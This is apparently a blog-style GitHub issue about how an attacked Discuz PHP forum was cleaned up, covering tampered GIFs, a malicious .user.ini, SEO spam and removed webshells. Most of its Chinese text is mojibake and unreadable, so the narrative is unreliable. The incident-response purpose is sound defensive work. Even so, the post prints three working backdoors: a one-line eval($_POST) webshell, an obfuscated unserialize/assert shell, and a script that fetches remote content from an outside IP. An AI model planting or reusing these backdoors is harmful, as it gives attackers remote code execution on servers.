blog icon indicating copy to clipboard operation
blog copied to clipboard

Published 20 hours ago verified publisher icon diamont1001

discuz 论坛被攻击以及应对方案记录

Open diamont1001 opened this issue 3 years ago • 0 comments

discuz ??涓?涓?寮?婧??? php 璁哄??妗??讹?寮?婧???浠ュ??璐逛娇???浣???瑕???寮?婧???灏卞?瀹规??琚?浜虹??绌跺苟?惧?版?娲?锛?杩?涔???涓?涓?娌℃??垮??????棰?锛???寰?蹇???澶憋?浣跨?ㄤ?灏辫???濂借?榛?瀹㈡???烘????????澶???

涓????ヨ?达???浠讹??剧??锛?涓?浼?杩?涓?????姣?杈?瀹规??涓?????锛???涓轰?浼?????浠舵???惧?版???″?ㄤ???锛??界?舵??跺??浜?瀹??ㄨ??匡?浣?????瑕???绋?搴?灏变???婕?娲?锛???浠ユ?′欢??璁哥??璇?锛?涓?浜鸿?????甯稿缓璁?????浠朵?浼?杩?涓???杩?绉诲?扮??涓??圭??缃?缁?瀛??ㄦ???″???姣?濡? ???块??浜??? ?? OSS??

?充?Linux??浠堕??瀹?淇??ゅ?戒护 chattr

?ㄤ?缁?浠ヤ??诲?讳复?惰В?虫?规?涔???锛???蹇?瑕???浠?缁?涓? chattr 杩?涓??戒护浠ュ??浣跨?ㄣ??

?蜂???浠ヨ??琛??惧害锛?杩???瑕??ㄥ?扮???? -i ???帮?涔?灏辨??锛?

璁惧????浠朵??借????ゃ???瑰????璁惧???炬?ュ?崇郴锛????朵??藉???ユ???板???瀹广??i???板?逛???浠?绯荤???瀹??ㄨ?剧疆??寰?澶у府?┿??

  • ??瀹???浠讹?chattr +i ??浠跺??
  • 瑙i?ら??瀹?锛?chattr -i ??浠跺??
  • 灞??ф?ョ??锛?lsattr ??浠跺??

????PHP?ㄩ┈??浠?/h2>

??浠ラ??杩?浠ヤ??戒护???????版?ㄩ┈??浠讹?

# /data/wwwroot/bbs/ 璺?寰??逛负浣? discuz ?圭??褰?
grep -r "php eval(" /data/wwwroot/bbs/
grep -r "eval(\$_POST" /data/wwwroot/bbs/

涓???浼??????烘?ョ?ㄦ?蜂?浼???涓?浜?淇??硅??? gif ??浠讹?姣?濡?锛?

image

??渚挎?句?涓???寮????? vi xxx.gif锛?

image

gif ??浠舵??琚?淇??硅???锛?寰????惧?ㄦ??浠跺熬?ㄨ?娣诲??浜? php 浠g??锛?杩?灏辨????姣?浠g????

OK锛???瑕?纭?淇?浠ヤ???浠堕?戒??? discuz 瀹??圭????浠讹?涔?灏辨???ㄦ?蜂?浼?????浠讹?灏辨????浠堕?藉??浜?灏卞??浠ヤ???

PS: 浠?澶╂?????烘?ョ?? gif ??浠跺?浠戒??ヤ???????涓?璺筹?灏辨?? ???????ч??? ??澶村??锛?锛?锛?

image

????璁板?

涓??㈣?板?涓?涔??????拌?????涓?琚??诲?荤??渚?瀛?锛???瀵硅?涓???涓???寰?涓?涓?锛???浠ュ苟娌℃??浠??规??涓??昏拷韪?婕?娲????规?锛?????浠??板??琛ㄩ?㈠?诲??涓存?惰В?虫?规???

涓???SEO ?诲??/h3>

涔?????娈垫?堕?村???扮?绔?璁块?????瑰?甯革?缁????ュ???帮??辨??绱㈠????? useragent 璁块??缃?绔?姣?姝e父璁块???跺??轰?澶ч????澶??俱??

php 绋?搴?涓??????拌?浜???棰?锛?棣???瑕????????荤?绔??圭??褰??ョ???????浜?涓?浜??扮????浠讹?

ls -latr

???扮?绔??圭??褰?纭?瀹?澶?浜?涓?涓? .user.ini ????浠讹???涓???浠舵?ユ??灏辨?????板??寤虹??锛?涔???缃?绔??虹?伴??棰???宸?涓?澶??堕?达?浜?????浠ヨ??瀹???杩???浠舵????楝笺??

?充? .user.ini ??瀹?涔???浠ョ?惧害涓?涓?锛?绠?????璇达?.user.ini 灏辨??涓?涓???浠ョ?辩?ㄦ?封????瀹?涔??????ㄦ????杞界?? php.ini??

?ョ?? .user.ini ??浠跺??瀹癸????伴???㈡??瀹?浜?缃?绔???璁块????缃? php锛??变?涔???娌℃??澶?浠斤??蜂???瀹瑰?璁颁???

?跺??????浠跺????锛?浠ヤ负??浠ユ?惧?浜?锛?璋??ョ??浜?澶╂?╀????虹?伴??棰?浜?锛???浜?涓? .user.ini ??浠跺?????????ㄥ?虹?颁?锛?杩借釜浜?寰?涔?锛??变?瀵?discuz ?? php ?戒?澶?????锛???杩?杩???娌″???伴??棰????规??虹?板?ㄥ????锛????芥?茬嚎???戒?锛?

?㈢?跺??涓???锛??e氨淇??????э?浣?浣?涔????抽???扮????锛?

  1. ?? .user.ini ??浠跺??瀹规?绌?/li>
  2. 浣跨??chattr ?戒护????浠堕??姝伙?chattr +i .user.ini

??杩?浠ヤ???浣?浠ュ??锛?杩?涓???棰?绠???瑙e?充???

浜????翠釜缃?绔???涔辩??浜?

??杩??????颁?涓???棰?锛??翠釜缃?绔???涔辩??浜?锛???????杩??╅??芥病?ョ???ュ??锛?涓??绘???″?ㄧ??浜?涓???娌$???轰?涔??????ワ??跺??绐??舵?冲?拌?$???虹?瀛?????涓?涓?浼?澶х??涓??借В?虫?规?锛? ????绯荤???

褰??讹?????????绯荤??? 涔???锛??????ㄤ?涓??借В?虫?规?绗?浜??★???娓?缂?瀛??? ?????娓?瀹???杩?????渚ュ垢瑙e?充???浣???濂芥??涓??胯??涓?浠夸?涓????藉?ㄩ???褰?涓?锛?杩?浜???澶╁???风????棰????ㄥ???哥兢????璧蜂?????????????

濂藉?э?娌″??娉?锛???娆℃?浜?缂?瀛?涔???锛????绘???????版??浠垛?? 浜?锛????讹??ㄧ?绔??圭??褰??????颁?涓?涓??版??浠讹?

  • news.php
  • newfile.php
  • vote.php

??浠跺?蜂???瀹瑰?涓?锛?

news.php

<?php @eval($_POST[abc])?>

寰????撅?news.php 杩???涓?涓??稿???????ㄧ?搴?锛???瑕?浣跨??ost璁块???跺??ame涓?code>abc???间腑???ヤ换浣?瀛?绗?覆锛??藉??浠ュ???php浠g???ユ?ц?锛?杩?涓??跺??灏辨???瑰????浜?锛?姣?濡????ヤ?娈靛惊?????ゆ?寸??浠g??绛?绛???

newfile.php

<?php
class A{
    var $test = "demo";
    function __destruct(){
        assert($this->test);
    }
}
$pw=strrev('doog');
$test = $_POST[$pw];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}";
$test_unser = unserialize($pp);

?>

vote.php

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Rcaonidaye_vvcbbiB = "http://69.176.95.99/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$Content_mb=getHTTPPage($Rcaonidaye_vvcbbiB."/index.php?host=".$host_name);

function getHTTPPage($url) {
        $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
        );
        $context = stream_context_create($opts);
        $html = @file_get_contents($url, false, $context);
        if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
        }
        return $html;
}

echo $Content_mb;
?>

??涓??解?? 瑙e?虫?规?锛?chattr ?戒护??

杩?娆℃?? php 浠g??锛????虫??璇????戒???涓??ワ?浜????ㄤ互涓?姣?涓???浠跺??娣诲??浜?涓?涓? 404 浠ュ?? return锛???????浠跺??瀹癸?

  1. ??浠堕??????ヤ唬??锛?
header('HTTP/1.1 404 Not Found');return;

// ????浠跺??瀹?// ...

姣?濡?锛?news.php ??浠跺氨????浜?锛?

<?php
header('HTTP/1.1 404 Not Found');return;
@eval($_POST[abc])?>
  1. chattr ?戒护??姝?/li> 
chattr +i news.php
chattr +i newfile.php
chattr +i vote.php

diamont1001 avatar Mar 27 '21 17:03 diamont1001